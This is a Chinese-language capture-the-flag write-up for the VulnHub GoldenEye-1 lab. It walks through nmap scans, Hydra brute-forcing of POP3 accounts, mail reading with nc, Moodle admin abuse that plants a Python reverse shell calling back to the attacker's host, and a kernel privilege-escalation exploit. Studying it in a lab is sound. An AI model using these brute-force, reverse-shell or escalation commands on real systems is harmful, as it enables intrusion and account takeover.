前言
这是一篇比较有意思的靶机,发现自己的知识储备真的不够多啊,来来回回看了很多,也借鉴别人的思路,最后形成了自己的知识,还是蛮有收获的。
靶机介绍:
靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/
信息收集:
1. 收集目标IP为:192.168.159.168
kail的IP为:192.168.159.137
arp-scan -l
2.使用nmap简单扫描
nmap 192.168.159.168
扫描到的有用信息:
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
1036/tcp open nsstp
1038/tcp open mtqp
5357/tcp open wsdapi
53/tcp open domain
25/tcp open smtp
80/tcp open http
22/tcp open ssh
3000/tcp open ppp
3.nmap -sS -sV -T5 -A -p- 192.168.159.168
-sS:半开扫描,扫描动作极少会被记录,更具有隐蔽性
-sV: 探测打开端口对应服务的版本信息
-T5:并行扫描
-A:包含了1-10000端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测
-p-:全端口扫描
扫描信息:
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open ssl/unknown
55007/tcp open pop3 Dovecot pop3d
4.查看页面源码,康康有没有有用的信息,发现一个terminal.js,这是字符串没准是个路径加到URL后面,看看有变化么。。出现了一个登录框,但是我们没用户名和密码呀,从页面源码中找找去
5.到这个路径下查看页面的源码,发现有提示信息,看到有两个名字,我们细读一下提示信息!!!
上面说:boris,确保你的默认密码已经修改了
我的线人说军情六处的人正计划潜入
一定要主要任何可疑的网络流量,(哈哈哈 我就是那个可疑的流量~)
下面是我编码了你的密码,(噢吼,不打自招,那我只要解密下,就能知道boris的密码啦~)
BTW的natalya她能破解你的密码。
6.我们先来破解下boris的密码,用burp解码,
大写的Boris不行,我们试试切换成小写,我们输入进刚刚的登录框中,登录成功,ok~
用户名:boris
密码:InvincibleHack3r
图上说:在非默认的端口上配置了pop3的服务
我记得刚刚确实有个**pop3[电子邮件协议]**的服务,看看是哪个端口,55007端口,先记下来。
7.再看看这个页面里还有其他信息么,看看源码,最下面好像有几行字,
原来boris和Natalya都是网络操作员啊,那就好说了,
漏洞利用
8.接下来,我们已经知道用户名了,那就用Hydra来爆破出他们的密码吧,
补充:
Hydra(九头蛇),开源的软件,kali中有集成。
支持爆破的服务有:
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC等
`
hydra -l Natalya -P /usr/share/wordlists/fasttrack.txt 192.168.159.168 -s 55007 pop3
hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.159.168 -s 55007 pop3
`
现在可算知道他俩的密码了
login:boris password:secret1!
login:Natalya password:bird
9.我们使用nc程序通过pop3端口
补充:nc(强大的网络工具)
list
:查看有几封邮件
retr 1
:查看邮件1的内容
三封都查看一下 没有什么可利用的信息,继续上第二个用户
有了重大发现:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn’t have the URL on outr internal Domain(如果你没有外部内部域名的URL): severnaya-station.com/gnocertdir
Make sure to edit your host file since you usually work remote off-network…
Since you’re a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
vim /etc/hosts
在里面将:192.168.159.168 severnaya-station.com 写入
10.在kail中打开搜狐,进入到severnaya-station.com/gnocertdir
我们刚刚已知了一个用户和密码,登录进去
username: xenia
password: RCP90rulez!
一通乱翻,发现这个xenia和Dr Doak有联系,再用Hydra爆破出doak的密码来,
user:doak
password:goat
11.接着看看这个doak的邮箱里面有啥东西呢,还和刚刚一样连接nc
nc 192.168.159.168 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
retr 1
If you’re reading this, congrats you’ve gotten this far. You know how tradecraft works right?
Because I don’t. Go to our training site and login to my account…dig until you can exfiltrate further information…
如果你正在读这篇文章,恭喜你已经走到了这一步。你知道谍报技术是怎么运作的吧?
因为我不喜欢。去我们的培训网站,登录我的账号.…继续挖掘,直到你能挖掘出更多信息…
username: dr_doak
password: 4England!
12.发现了一个txt文件,太好了~胜利在望啊
说有个图片在这个目录下,激动搓搓手~
???这是什么鬼,给我个这,算怎么回事啊,好吧,那就看看这个图片有神马可疑之处。。
还真藏了谜语在这里,看这个像base64的编码方式
解出密码为:xWinter1995x!
13.前面内个图片里说了,
意思大概是说,我能够拿到这个apps的admin通过clear txt。
所以我们现在拿到的密码就是admin账号的。管理员用户身份继续登陆应用程序。
用户名:admin
密码:xWinter1995x!
登录成功之后一顿乱找。。。发现这个是一个Moodle,到网上查查有没有这个版本泄露的漏洞!!!
ok,ok存在未授权访问漏洞。。。那我们可以利用哈
14.做到这里,该拿sehll了
根据参考文章,需要先更改设置
Plugins-Text editors-TinyMCE,Spell engine选项修改为PSpellShell
15.在如下选项卡中,添加反弹Shell代码
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.137",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
16.利用该漏洞使用msfconsole框架
先搜索存不存在moodle,在使用,在设置payload。
17.需要找到一个能发送数据包出去的地方,这里找到了能发送邮件的地方,随意填写一些文字即可,点击Toggle spellchecker进行发送shell到本地。
18.在本地开启nc监听端口
python -m SimpleHTTPServer 5555
监听到之后,输入命令:python -c 'import pty; pty.spawn("/bin/bash")'知道的内核版本,去搜索相应的漏洞
获得了一个低权限的用户。
19.提权
使用exploit37292的shell,从kali本地中查找
然后将gcc改为cc,步骤如图
为什么要这么做呢??也是看了许多文章才明白,目标主机上不存在GCC编译,只能CC编译,所以在需要把Google Spell编译改成PSpellShell编译。
20.改完之后,到监听的端口,下载37292.c文件
成功啦!!!!!